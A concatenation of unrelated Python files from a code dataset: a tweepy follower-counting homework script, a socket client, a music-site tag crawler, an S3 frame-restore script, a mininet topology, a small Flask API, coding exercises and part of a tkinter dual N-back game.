l)]\n\n# =============================================================================\n# function to determine most active follower, most popular follower,\n# and a dictionary of followers\n# =============================================================================\n\ndef get_followers(handles_list):\n global number_requests\n #creating a dictionary for the followers\n follower_dict = {}\n\n #empty dictionaries to keep the most active and most popular\n most_active_laymen = {'screen_name' : 0} #default dict key/value\n most_active_expert = {'screen_name' : 0}\n most_active_celebrity = {'screen_name' : 0}\n most_popular = {'screen_name' : 0}\n\n for user in handles_list:\n loop_count = 0\n current_time = time.time()\n print(\"User handle: \" + user + \". Elapsed time: \" + str(round((current_time - start), 2)))\n try:\n user_follower_ids = api.followers_ids(user)\n number_requests += 1\n print(\"Got follower ids! (request count: \" + str(number_requests) + \").\")\n\n for batch_list in batch(user_follower_ids):\n time.sleep(sleep_time) #to avoid rate limit\n \n try:\n followers = api.lookup_users(batch_list)\n number_requests += 1\n print(\"Batch #\" + str(loop_count) + \": \" + str(loop_count*batch_size + len(batch_list)) +\n \" (request count: \" + str(number_requests) + \").\")\n loop_count+=1\n\n for follower in followers:\n screen_name = follower.screen_name\n tweet_count = follower.statuses_count\n followers_count = follower.followers_count\n \n # finding most active friend by category\n if followers_count <= laymen_follower_count:\n if tweet_count > list(most_active_laymen.values())[0]:\n most_active_laymen = {screen_name : tweet_count}\n elif followers_count >= celebrity_follower_count:\n if tweet_count > list(most_active_celebrity.values())[0]:\n most_active_celebrity = {screen_name : tweet_count}\n else: #aka an expert\n if tweet_count > list(most_active_expert.values())[0]:\n most_active_expert = {screen_name : tweet_count}\n \n if followers_count > list(most_popular.values())[0]:\n most_popular = {screen_name : followers_count}\n \n #updating the dictionary;\n #ONLY SAVING LAYMEN AND EXPERTS (per assignment)\n #values are tuple with tweet count first, follower count second\n if followers_count < celebrity_follower_count:\n follower_dict.update({screen_name : (tweet_count, followers_count)})\n\n except tweepy.TweepError as e:\n print(\"API call to lookup users for follower id failed: \" + str(e.reason) + \" Skipping this batch.\")\n\n except tweepy.TweepError as e:\n print(\"API call to get follower ids failed: \" + str(e.reason) + \" Skipping this user.\")\n\n\n return (follower_dict, most_active_laymen, most_active_expert,\n most_active_celebrity, most_popular) #returning tuple\n\n# =============================================================================\n# function to determine most active friends by category, most popular friend,\n# and a dictionary of friends (friends are accounts you follow)\n# =============================================================================\n\ndef get_friends(handles_list):\n global number_requests\n #creating a dictionary for the followers\n friends_dict = {}\n\n #empty dictionaries to keep the most active and most popular\n most_active_laymen = {'screen_name' : 0} #default dict key/value\n most_active_expert = {'screen_name' : 0}\n most_active_celebrity = {'screen_name' : 0}\n most_popular = {'screen_name' : 0}\n\n for user in handles_list:\n loop_count = 0\n current_time = time.time()\n print(\"User handle: \" + user + \". Elapsed time: \" + str(round((current_time - start), 2)))\n try:\n user_friends_ids = api.friends_ids(user)\n number_requests += 1\n print(\"Got friend ids! (request count: \" + str(number_requests) + \").\")\n\n for batch_list in batch(user_friends_ids):\n time.sleep(sleep_time) #to avoid rate limit\n \n try:\n friends = api.lookup_users(batch_list)\n number_requests += 1\n print(\"Batch #\" + str(loop_count) + \": \" + str(loop_count*batch_size + len(batch_list)) +\n \" (request count: \" + str(number_requests) + \").\")\n loop_count+=1\n\n for friend in friends:\n screen_name = friend.screen_name\n tweet_count = friend.statuses_count\n followers_count = friend.followers_count\n \n # finding most active friend by category\n if followers_count <= laymen_follower_count:\n if tweet_count > list(most_active_laymen.values())[0]:\n most_active_laymen = {screen_name : tweet_count}\n elif followers_count >= celebrity_follower_count:\n if tweet_count > list(most_active_celebrity.values())[0]:\n most_active_celebrity = {screen_name : tweet_count}\n else: #aka an expert\n if tweet_count > list(most_active_expert.values())[0]:\n most_active_expert = {screen_name : tweet_count}\n # finding most popular friend\n if followers_count > list(most_popular.values())[0]:\n most_popular = {screen_name : followers_count}\n \n #updating the dictionary;\n #ONLY SAVING LAYMEN AND EXPERTS (per assignment)\n #values are tuple with tweet count first, follower count second\n if followers_count < celebrity_follower_count:\n friends_dict.update({screen_name : (tweet_count, followers_count)})\n\n except tweepy.TweepError as e:\n print(\"API call to lookup users for friend id failed: \" + str(e.reason) + \" Skipping this batch.\")\n\n except tweepy.TweepError as e:\n print(\"API call to get friend ids failed: \" + str(e.reason)+ \" Skipping this user.\")\n\n return (friends_dict, most_active_laymen, most_active_expert,\n most_active_celebrity, most_popular) #returning tuple\n\n\n# =============================================================================\n# return dictionary with highest value\n# =============================================================================\n\ndef get_highest(list_of_dicts):\n values = list(list_of_dicts.values())\n keys = list(list_of_dicts.keys())\n max_value = max(values)\n values_index = values.index(max_value)\n return {keys[values_index] : values[values_index]}\n\n# =============================================================================\n# first degree\n# =============================================================================\nnumber_requests = 0\n\nprint(\"Starting to find followers of \" + start_twitter_handle)\n\n(followers_WUSTLPoliSci,\n most_active_follower_WUSTL_laymen,\n most_active_follower_WUSTL_expert,\n most_active_follower_WUSTL_celebrity,\n most_popular_follower_WUSTL) = get_followers([start_twitter_handle])\n\nmost_active_follower_WUSTL = get_highest({**most_active_follower_WUSTL_laymen,\n **most_active_follower_WUSTL_expert,\n **most_active_follower_WUSTL_celebrity})\n\nprint('Most active follower of ' + start_twitter_handle + ': ' + str(most_active_follower_WUSTL))\n# Most active follower of WUSTLPoliSci: {'tubuann_only': 109517}\nprint('Most popular follower of ' + start_twitter_handle + ': ' + str(most_popular_follower_WUSTL))\n# Most popular follower of WUSTLPoliSci: {'BrendanNyhan': 81142}\n\nprint(\"Starting to find friends of \" + start_twitter_handle)\n\n(friends_WUSTLPoliSci,\n most_active_friend_WUSTL_laymen,\n most_active_friend_WUSTL_expert,\n most_active_friend_WUSTL_celebrity,\n most_popular_friend_WUSTL) = get_friends([start_twitter_handle])\n\nprint('Most active laymen friend of ' + start_twitter_handle + ': ' +\n str(most_active_friend_WUSTL_laymen))\n# Most active laymen friend of WUSTLPoliSci: {'usmanfalalu1' : 1445}\nprint('Most active expert friend of ' + start_twitter_handle + ': ' +\n str(most_active_friend_WUSTL_expert))\n# Most active expert friend of WUSTLPoliSci: {'prof_nokken' : 12562}\nprint('Most active celebrity friend of ' + start_twitter_handle + ': ' +\n str(most_active_friend_WUSTL_celebrity))\n# Most active expert friend of WUSTLPoliSci: {'nytimes' : 406561}\nprint('Most popular friend of ' + start_twitter_handle + ': ' +\n str(most_popular_friend_WUSTL))\n# Most popular friend of WUSTLPoliSci: {'BarackObama' : 122267221}\n\n# =============================================================================\n# second degree\n# =============================================================================\n\n# NB: only technically need most active\n\nprint(\"Starting to find followers of the followers of \" + start_twitter_handle)\n\n(second_degree_followers,\n second_degree_most_active_follower_laymen,\n second_degree_most_active_follower_expert,\n second_degree_most_active_follower_celebrity,\n second_degree_most_popular_follower) = get_followers(list(followers_WUSTLPoliSci.keys()))\n\nmost_active_follower = get_highest({**most_active_follower_WUSTL_laymen,\n **most_active_follower_WUSTL_expert,\n **second_degree_most_active_follower_laymen,\n **second_degree_most_active_follower_expert})\n\nprint('Most active user of followers of ' + start_twitter_handle + ' and its followers: ' +\n str(most_active_follower))\n#Most active user of followers of WUSTLPoliSci and its followers: {'Terryg1979': 254582}\n\nprint(\"Starting to find friends of friends of \" + start_twitter_handle)\n\n(second_degree_friends,\n second_degree_most_active_friend_laymen,\n second_degree_most_active_friend_expert,\n second_degree_most_active_friend_celebrity,\n second_degree_most_popular_friend) = get_friends(list(friends_WUSTLPoliSci.keys()))\n\nmost_active_friend = get_highest({**most_active_friend_WUSTL_laymen,\n **most_active_friend_WUSTL_expert,\n **second_degree_most_active_friend_laymen,\n **second_degree_most_active_friend_expert})\n\nprint('Most active user of friends of ' + start_twitter_handle + ' and its friends: ' +\n str(most_active_friend))\n# Most active user of friends of WUSTLPoliSci and its friends: {'MissAir': 148105}\n\nend = time.time()\n\nprint(\"Total run time (in seconds): \" + str(end - start))\n#Total run time (in seconds): 25452.960236549377\n","sub_path":"HW/HW3/aprati_hw3.py","file_name":"aprati_hw3.py","file_ext":"py","file_size_in_byte":14418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"418938063","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/2/22 21:43\n# @Author : Aries\n# @Site : \n# @File : IO多路复用Client.py\n# @Software: PyCharm\n\nimport socket\n\nsk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# sk.connect((\"127.0.0.1\",8003))\nsk.connect((\"127.0.0.1\", 8090)) # 用于实例五\n\n# 对应示例1\n# while True:\n# data = sk.recv(1024)\n# print(str(data,\"utf-8\"))\n# ipt = input(\">>>\").encode(\"utf8\")\n# sk.sendall(ipt)\n\n# 对应2\nwhile True:\n ipt = input(\">>>\").encode(\"utf8\")\n sk.sendall(ipt)\n data = sk.recv(1024)\n print(str(data, \"utf-8\"))\n\n\n\n# *************************client对应实例四\n# import socket\n# client = socket.socket()\n#\n# client.connect(('localhost', 9000))\n#\n# while True:\n# cmd = input('>>> ').strip()\n# if len(cmd) == 0 : continue\n# client.send(cmd.encode('utf-8'))\n# data = client.recv(1024)\n# print(data.decode())\n#\n# client.close()\n","sub_path":"PythonBase/week6/IO多路复用Client.py","file_name":"IO多路复用Client.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"224146999","text":"# coding=utf-8\n__author__ = 'arachis'\n\nimport csv\nfrom urllib.parse import quote\nimport random\nfrom time import sleep\n\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndef doJob(id,yyt_song,yyt_artist):\n yyt_song = yyt_song.lower()\n yyt_artist = yyt_artist.lower()\n\n \"\"\"爬取yyt_artist的yyt_song的标签信息,返回结果集\"\"\"\n # print yyt_song,yyt_artist\n url = u'http://www.xiami.com/search?key='+quote(str(yyt_song+\" \"+yyt_artist))\n #加上代理ip池\n ip_list=['112.253.22.142:80','112.253.22.141:80','220.194.199.184:80']\n #使用一组ip调用random函数来随机使用其中一个ip #参数是一个字典{'类型':'代理ip:端口号'}\n proxies = {'http':random.choice(ip_list)}\n #伪装头\n header={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'}\n print(url)\n res = requests.request('POST',url,timeout=60,headers=header)\n\n res = res.text.encode(res.encoding).decode('utf8')\n soup = BeautifulSoup(res, 'html.parser')\n music = soup.find(name='div', attrs={'class': 'search_result_box'})\n # print music\n track_list = music.find(name='table',attrs={\"class\":\"track_list\"})\n # print track_list\n if( not track_list ):#没有数据,返回\n return\n results = track_list.find_all(name='tbody')\n # print results\n cur_first_song = \"\"\n cur_first_artist = \"\"\n cur_first_songid = \"\"\n sign = 0 #匹配等级\n for result in results:\n # print result\n song_id = result.find(name=\"td\",attrs={\"class\":\"chkbox\"}).input[\"value\"]\n\n #\n song = result.find(name='a',attrs={'target':'_blank'})\n song_name = song[\"title\"].lower()\n # type(song_title)\n artist = result.find(name=\"td\", attrs={\"class\": \"song_artist\"}).a\n artist_name = artist[\"title\"].lower()\n\n #定制匹配规则:优先匹配歌曲,然后匹配艺人\n if song_name == yyt_song and artist_name == yyt_artist:\n cur_first_song = song_name\n cur_first_artist = artist_name\n cur_first_songid = song_id\n sign = 3\n break\n elif song_name == yyt_song and artist_name != yyt_artist and sign < 2:\n cur_first_song = song_name\n cur_first_artist = artist_name\n cur_first_songid = song_id\n sign = 2\n elif (song_name.__contains__(yyt_song) or yyt_song.__contains__(song_name) ) and sign < 1:\n cur_first_song = song_name\n cur_first_artist = artist_name\n cur_first_songid = song_id\n sign = 1\n else:\n continue\n\n # 爬取对应歌曲的所有UGC标签,并写入csv文件\n url_moretags = \"http://www.xiami.com/song/moretags/id/\"+cur_first_songid\n moretags_page = requests.request('POST',url_moretags,timeout=60,headers=header)\n moretags_page = moretags_page.text.encode(moretags_page.encoding).decode('utf-8')\n soup = BeautifulSoup(moretags_page, 'html.parser')\n tag_cloud = soup.find(name='div', attrs={\"class\": \"tag_cloud\"})\n song_tags = \"\"\n if( tag_cloud ):\n song_tags = tag_cloud.find_all(name=\"a\")\n # print song_tags\n tags = \"\"\n split = \"@@@\"\n for tag in song_tags:#http://cuiqingcai.com/1319.html\n tags += str(tag.string).replace(\"@\",\"\") +split\n tags = tags[:len(tags)-3]\n record = [id,cur_first_song.replace(\",\",\"\"),cur_first_artist.replace(\",\",\"\"),cur_first_songid,tags.replace(\",\",\"\"),str(sign)]\n print ('id:'+str(id)+u\",歌曲:\"+cur_first_song+u\",艺人:\"+cur_first_artist+u\",歌曲id: \"+cur_first_songid+u\",标签:\"+tags+\",匹配等级:\"+str(sign))\n return record\n\n\ndef load_part(path):\n csv = pd.read_csv(path,header=None,encoding='utf-8')\n # print csv.values[0][0].decode('utf-8')\n return csv.values\n\nif __name__ == \"__main__\":\n # record = doJob(1,'movin','タカチャ')\n jobID = 4\n i = 0\n path = 'data\\part-'\n while( i< 337 ) :\n if i % 10 == jobID:\n # http://www.cnblogs.com/vamei/archive/2013/03/12/2954938.html\n idx = '%05d' % i\n part = load_part( path+idx )\n\n with open('yyt标签爬虫'+idx+'.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n writer.writerow(['id','虾米歌曲', '虾米艺人', '虾米歌曲id', '虾米标签','匹配等级'])\n\n for ll in part:\n id,yyt_song,yyt_artist = str(ll[0]),str(ll[1]),str(ll[2])\n try:\n record = doJob(id,yyt_song,yyt_artist)\n if( record ):\n writer.writerow(record)\n # csvfile.close()\n sleep(2)\n except Exception as e:\n if hasattr(e,\"code\"):\n print(e.code)\n if hasattr(e,\"reason\"):\n print\n var = e.reason\n print\n print(\"Connection refused by the server..\")\n print(\"Let me sleep for 5 seconds\")\n sleep(5)\n continue\n csvfile.close()\n i += 1\n\n\n\n\n","sub_path":"learntoCrawler/crawler_xiami_py3.py","file_name":"crawler_xiami_py3.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"298378652","text":"import imutils\nimport cv2\nfrom pgdb import connect\nimport boto3\nimport os\nfrom dotenv import load_dotenv\nimport datetime\nimport copy\nimport time\nimport uuid\nimport sys\nimport math\nimport pandas as pd\nfrom multiprocessing import Pool\n\n# Load environment variables\nload_dotenv(dotenv_path=\"../../video-annotation-tool/.env\")\nAWS_ACCESS_KEY_ID = os.getenv(\"AWS_ACCESS_KEY_ID\")\nAWS_SECRET_ACCESS_KEY = os.getenv(\"AWS_SECRET_ACCESS_KEY\")\nS3_BUCKET = os.getenv('AWS_S3_BUCKET_NAME')\ns3 = boto3.client('s3', aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\nS3_ANNOTATION_FOLDER = os.getenv(\"AWS_S3_BUCKET_ANNOTATIONS_FOLDER\")\nS3_VIDEO_FOLDER = os.getenv('AWS_S3_BUCKET_VIDEOS_FOLDER')\nS3_TRACKING_FOLDER = os.getenv(\"AWS_S3_BUCKET_TRACKING_FOLDER\")\n\n# connect to db\nDB_NAME = os.getenv(\"DB_NAME\")\nDB_HOST = os.getenv(\"DB_HOST\")\nDB_USER = os.getenv(\"DB_USER\")\nDB_PASSWORD = os.getenv(\"DB_PASSWORD\")\n\n\ndef getCapture(filename):\n # grab video stream\n url = s3.generate_presigned_url('get_object',\n Params={'Bucket': S3_BUCKET,\n 'Key': S3_VIDEO_FOLDER + filename},\n ExpiresIn=86400)\n capture = cv2.VideoCapture(url)\n return capture\n\n\ndef getVideoFrame(capture, frame_num):\n capture.set(1, frame_num)\n check, frame = capture.retrieve()\n if (check is None or not check):\n return None\n return frame\n\n\ndef upload_image(frame, image):\n temp_file = str(uuid.uuid4()) + \".png\"\n cv2.imwrite(temp_file, frame)\n s3.upload_file(temp_file, S3_BUCKET, S3_ANNOTATION_FOLDER +\n image, ExtraArgs={'ContentType': 'image/png'})\n os.system('rm ' + temp_file)\n return\n\n\ndef getAllImages(filename, rows):\n print(f'Working on {filename}')\n capture = getCapture(filename)\n if capture is None:\n print('Capture is broken')\n return\n length = rows.shape[0]\n for index, (_, row) in enumerate(rows.iterrows()):\n print(f'{filename} at {round(100*(index/length), 1)}%')\n frame_num = row.framenum\n if (pd.isna(frame_num)):\n frame_num = row.timeinvideo * 29.97002997003\n frame = getVideoFrame(capture, round(frame_num))\n if (frame is None):\n print(f'Something went wrong with annotation: {row.id}')\n print(row)\n continue\n upload_image(frame, row.image)\n capture.release()\n return\n\n\nif __name__ == \"__main__\":\n missingImages = pd.read_csv(sys.argv[1])\n with Pool() as p:\n p.starmap(getAllImages, map(\n lambda x: x, missingImages.groupby('filename')))\n","sub_path":"misc-scripts/restoreMissingImages.py","file_name":"restoreMissingImages.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"506634371","text":"from mininet.topo import Topo\nimport json\nimport pdb\n\n\nclass MyTopo( Topo ):\n \"\"\"test topology\"\"\"\n \n def __init__( self ):\n # Initialize topology\n Topo.__init__( self )\n\n self.N_LAYER = [2, 2, 2]\n self.N_HOSTS = 6\n\n pdb.set_trace()\n self.Switches = {}\n #create switches\n for l1 in range(1, self.N_LAYER[0] + 1):\n switch1 = self.addSwitch('s%d'%(l1),\n dpid = \"%03d%03d%03d\"%(l1,0,0))\n self.Switches['s%d'%(l1)] = switch1\n \n for l2 in range(1, self.N_LAYER[1] + 1):\n switch2 = self.addSwitch('s%d_%d'%(l1, l2),\n dpid = \"%03d%03d%03d\"%(l1,l2,0))\n self.Switches['s%d_%d'%(l1, l2)] = switch2\n \n self.addLink(switch1, switch2,\n port1 = l2,\n port2 = self.N_LAYER[2] + 1)\n \n for l3 in range(1, self.N_LAYER[2] + 1):\n switch3 = self.addSwitch('s%d_%d_%d'%(l1,l2,l3),\n dpid = \"%03d%03d%03d\"%(l1,l2,l3))\n self.Switches['s%d_%d_%d'%(l1,l2,l3)] = switch3\n self.addLink(switch2, switch3,\n port1 = l3,\n port2 = self.N_HOSTS + 1)\n\n self.addhosts(switch3, (l1,l2,l3))\n\n for i in range(1, self.N_LAYER[0]):\n self.addLink(self.Switches['s%d'%(i)],\n self.Switches['s%d'%(i + 1)],\n port1 = self.N_LAYER[1] + 1,\n port2 = self.N_LAYER[1] + 2)\n \n self.create_config()\n\n def addhosts(self, switch, index):\n l1, l2, l3 = index\n self.Hosts = {}\n for i in range(1, self.N_HOSTS+1):\n i_tuple = (l1, l2, l3, i)\n host = self.addHost('h%d_%d_%d_%d'%i_tuple,\n ip=\"%d.%d.%d.%d\"%i_tuple,\n mac=\"00:00:%02x:%02x:%02x:%02x\"%i_tuple)\n\n self.Hosts['h%d_%d_%d_%d'%i_tuple] = host\n self.addLink(switch, host, port1 = i)\n\n def init_custom_switch(self, c, dpid):\n c[\"switches\"][str(int(dpid, base=16))] = {}\n \n switch = c[\"switches\"][str(int(dpid, base=16))]\n switch[\"real\"] = str(int(dpid, base = 16))\n switch[\"rtov\"] = {}\n switch[\"port_type\"] = {}\n\n return switch\n \n def config_l12(self, c, dpid, layer):\n if layer == 0:\n extra = 2\n else:\n extra = 1\n \n switch = self.init_custom_switch(c, dpid)\n for port in range(1, self.N_LAYER[layer+1] + 1 + extra):\n switch[\"rtov\"][str(port)] = str(port)\n switch[\"port_type\"][str(port)] = 1\n\n def config_l3(self, c1, c2, dpid):\n switch1 = self.init_custom_switch(c1, dpid)\n switch2 = self.init_custom_switch(c2, dpid)\n\n for port in range(1, self.N_HOSTS/2 + 1):\n switch1[\"rtov\"][str(port)] = str(port)\n switch1[\"port_type\"][str(port)] = 0\n\n for port in range(self.N_HOSTS/2 + 1, self.N_HOSTS + 1):\n switch2[\"rtov\"][str(port)] = int(port - self.N_HOSTS/2)\n switch2[\"port_type\"][str(port)] = 0\n\n switch1[\"rtov\"][str(self.N_HOSTS+1)] = str(self.N_HOSTS/2 + 1)\n switch1[\"port_type\"][str(self.N_HOSTS+1)] = 1\n switch2[\"rtov\"][str(self.N_HOSTS+1)] = str(self.N_HOSTS/2 + 1)\n switch2[\"port_type\"][str(self.N_HOSTS+1)] = 1\n\n \n def create_config(self):\n config = {}\n \n config[\"2C:1B:CD:B6:21:D6:1F:8A:A7:21:4B:96:FC:A8:D0:D6:33:63:CA:C5\"] = {}\n c1 = config[\"2C:1B:CD:B6:21:D6:1F:8A:A7:21:4B:96:FC:A8:D0:D6:33:63:CA:C5\"]\n c1[\"type\"] = \"common\"\n c1[\"vlan_vid\"] = 1\n c1[\"switches\"] = {}\n\n config[\"FE:DD:44:D7:C2:D9:58:B5:6F:EF:51:C7:4E:2F:AD:AA:B9:1B:A4:0B\"] = {}\n c2 = config[\"FE:DD:44:D7:C2:D9:58:B5:6F:EF:51:C7:4E:2F:AD:AA:B9:1B:A4:0B\"]\n c2[\"type\"] = \"common\"\n c2[\"vlan_vid\"] = 2\n c2[\"switches\"] = {}\n\n for l1 in range(1, self.N_LAYER[0]+1):\n dpid = \"%03d%03d%03d\"%(l1,0,0)\n self.config_l12(c1, dpid, 0)\n self.config_l12(c2, dpid, 0)\n \n for l2 in range(1, self.N_LAYER[1]+1):\n dpid = \"%03d%03d%03d\"%(l1,l2,0)\n self.config_l12(c1, dpid, 1)\n self.config_l12(c2, dpid, 1)\n \n for l3 in range(1, self.N_LAYER[2]+1):\n dpid = \"%03d%03d%03d\"%(l1,l2,l3)\n self.config_l3(c1, c2, dpid)\n\n f = open(\"test_config.json\", \"w\")\n json.dump(config, f, indent = 4)\n\ntopos = { 'test_topo_100': ( lambda: MyTopo() ) }\n","sub_path":"evaluation/test_vlan.py","file_name":"test_vlan.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"397133945","text":"from flask import Flask,jsonify,request\n\nfrom services import get_bullying_prediction, handle_train\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/train-model', methods=['GET'])\ndef train_model():\n\treturn jsonify({\"status\":handle_train()})\n\n\n@app.route('/check-bullying', methods=['POST'])\ndef check_bullying():\n\tdata = request.json\n\treturn jsonify({\"result\":get_bullying_prediction(data[\"data\"])})\n\nif __name__ == '__main__':\n app.run(host='192.168.1.10', port=8080)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"23169037","text":"# 时间复杂度O(n^3)\r\n# 解题思想:因为题目限定x和y都在0-100的范围内,在每次输入的时候就对矩形内的元素进行染色\r\n# 最后在10000个元素中进行遍历,找到染色的元素则面积增加。\r\n# 进一步优化可以定义MaxX和MaxY来限定遍历的边界,减少占用的空间。\r\nN = int(input()) # 输入矩形的个数\r\nValue = [['White' for i in range(101)] for i in range(101)] # 特别需要注意创建二维数组的方法\r\nfor i in range(N):\r\n X1, Y1, X2, Y2 = map(int, input().split()) # 一行输入矩形四个坐标的值\r\n for x in range(X1, X2): # 遍历矩形的X坐标\r\n for y in range(Y1, Y2): # 遍历矩形的Y坐标\r\n Value[x][y] = 'Blue' # 将矩形内的元素染色\r\n\r\nArea = 0 # 面积\r\nfor i in range(101): # 遍历完整范围内的Y坐标\r\n for j in range(101): # 遍历完整范围内的X坐标\r\n if Value[i][j] == 'Blue': # 如果这个坐标被染色\r\n Area += 1\r\nprint(Area)\r\n","sub_path":"_20140902.py","file_name":"_20140902.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"133895037","text":"import numpy as np\n\n\na = np.zeros((70))\nstr = \"abccccdd\"\nfor i in range(len(str)):\n a[ord(str[i]) - 65] += 1\n#print(a)\nflag = False\nfor i in range(70):\n if a[i] % 2 != 0:\n a[i] -= 1\n flag = True\nif flag == False:\n return sum(a)\nelse:\n return sum(a) + 1","sub_path":"LeetCode/409/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"559229999","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 14 20:55:38 2018\r\n\r\n@author: Ryan\r\n\"\"\"\r\n\r\nimport tkinter, tkinter.simpledialog, Session_Settings\r\n\r\n\r\n \r\nclass n_back_session_Frame(tkinter.Frame):\r\n \"\"\"A frame to contain the information and grid screen for the N back training session.\r\n Is a separate frame so that another frame can contain the configuration screen.\r\n \"\"\" \r\n \r\n def __init__(self,master,*args, **kwargs):\r\n tkinter.Frame.__init__(self,master,*args,**kwargs)\r\n \r\n self.master = master\r\n#set properties of this frame\r\n self['background'] = 'light grey'\r\n self['borderwidth'] = 2\r\n self['relief'] = 'sunken'\r\n self[\"height\"] = 802\r\n self[\"width\"] = 802\r\n self.grid(row=0, column=0)\r\n self.grid_propagate(False) \r\n \r\n #create child elements of the frame\r\n self.left_Bar_Frame = self.create_Left_Bar_Frame()\r\n self.right_Grid_Canvas = self.create_Right_Grid_Space()\r\n self.top_Header_Canvas = self.create_Top_Header_Score_Canvas()\r\n self.bottom_control_Display_Frame = self.create_Bottom_Control_Display_Frame()\r\n \r\n def create_Left_Bar_Frame(self):\r\n \"\"\"\r\n Create the frame that is to contain the current score, average N back, points per correct answer,\r\n speed or delay per displayed memory symbol, whether the audio symbols are to be numbers or letters, and the visual grid size.\r\n Along with any other parameters or meta level game controls.\r\n ##########\r\n OUTPUTS:\r\n left_Bar_Frame = the frame to contain all meta level game paramters. \r\n \"\"\"\r\n #creater child(slave) widgets of the main Frame \r\n left_Bar_Frame = tkinter.Frame(self)\r\n #set the left bar frame to be in row 0 column 0, i.e to the left of the GUI\r\n left_Bar_Frame.grid(row= 0, column= 0, rowspan = 3)\r\n \r\n left_Bar_Frame['background'] = 'light grey'\r\n left_Bar_Frame['borderwidth'] = 2\r\n left_Bar_Frame['relief'] = 'ridge'\r\n left_Bar_Frame[\"height\"] = 800\r\n left_Bar_Frame[\"width\"] = 200\r\n left_Bar_Frame.grid_propagate(False)\r\n \r\n return left_Bar_Frame\r\n \r\n def create_Right_Grid_Space(self):\r\n \"\"\"\r\n Create the canvas object that is to contain the dual N back display grid\r\n ##########\r\n INPUTS: \r\n main_Frame = an instante of the frame that this second frame is to be the child widget of.\r\n OUTPUTS:\r\n right_Grid_Frame = the frame to contain the dual N back squares. \r\n \"\"\"\r\n \r\n #creater child(slave) widgets of the main Frame \r\n right_Grid_Canvas = tkinter.Canvas(self)\r\n #set the left bar frame to be in row 0 column 0, i.e to the left of the GUI\r\n right_Grid_Canvas.grid(row=1, column=1)\r\n \r\n right_Grid_Canvas['background'] = 'white'\r\n right_Grid_Canvas['borderwidth'] = 0\r\n right_Grid_Canvas['relief'] = 'ridge'\r\n right_Grid_Canvas[\"height\"] = 600\r\n right_Grid_Canvas[\"width\"] = 600\r\n right_Grid_Canvas.grid_propagate(False)\r\n \r\n return right_Grid_Canvas\r\n \r\n def create_Top_Header_Score_Canvas(self):\r\n \"\"\"\r\n Create the frame that is to contain the score track header above the dual N back grid\r\n ##########\r\n INPUTS: \r\n main_Frame = an instante of the frame that this second frame is to be the child widget of.\r\n OUTPUTS:\r\n top_Header_Score_Frame = the frame to contain the dual N back squares. \r\n \"\"\"\r\n #creater child(slave) widgets of the main Frame \r\n top_Header_Score_Canvas = tkinter.Canvas(self)\r\n #set the left bar frame to be in row 0 column 0, i.e to the left of the GUI\r\n top_Header_Score_Canvas.grid(row=0, column=1)\r\n \r\n top_Header_Score_Canvas ['background']='light blue'\r\n top_Header_Score_Canvas ['borderwidth'] = 0\r\n top_Header_Score_Canvas ['relief'] = 'sunken'\r\n top_Header_Score_Canvas [\"height\"] = 100\r\n top_Header_Score_Canvas [\"width\"] = 600\r\n top_Header_Score_Canvas.grid_propagate(False)\r\n \r\n return top_Header_Score_Canvas \r\n \r\n def create_Bottom_Control_Display_Frame(self):\r\n \"\"\"\r\n Create the frame that is to contain the instructions\r\n ##########\r\n INPUTS: \r\n main_Frame = an instante of the frame that this second frame is to be the child widget of.\r\n OUTPUTS:\r\n bottom_Control_Display_Frame = the frame to contain the instructions. \r\n \"\"\"\r\n #creater child(slave) widgets of the main Frame \r\n bottom_Control_Display_Frame = tkinter.Frame(self)\r\n #set the left bar frame to be in row 0 column 0, i.e to the left of the GUI\r\n bottom_Control_Display_Frame.grid(row=2, column=1)\r\n \r\n bottom_Control_Display_Frame['background'] = 'light green'\r\n bottom_Control_Display_Frame['borderwidth'] = 1\r\n bottom_Control_Display_Frame['relief'] = 'flat'\r\n bottom_Control_Display_Frame[\"height\"] = 100\r\n bottom_Control_Display_Frame[\"width\"] = 600\r\n bottom_Control_Display_Frame.grid_propagate(False)\r\n \r\n return bottom_Control_Display_Frame \r\n \r\nclass Configuration_Frame(tkinter.Frame):\r\n \"\"\"Create a frame to contain the information and grid screen for the configuration screen.\r\n Is a separate frame so that another frame can contain the N back training session screen.\r\n \"\"\" \r\n \r\n def __init__(self,master,*args, **kwargs):\r\n tkinter.Frame.__init__(self,master,*args,**kwargs)\r\n \r\n self.master = master\r\n\r\n self['background'] = 'light blue'\r\n self['borderwidth'] = 2\r\n self['relief'] = 'raised'\r\n self[\"height\"] = 802\r\n self[\"width\"] = 802\r\n self.grid(row=0, column=0) \r\n self.grid_propagate(False)\r\n \r\n self.__set_up_input_error_label()\r\n self.__set_up_speed_per_n_entry_widget()\r\n self.__set_up_letters_over_numbers_widget()\r\n self.__set_up_rounds_per_n_back_session_widget()\r\n self.__set_up_events_per_round_widget()\r\n 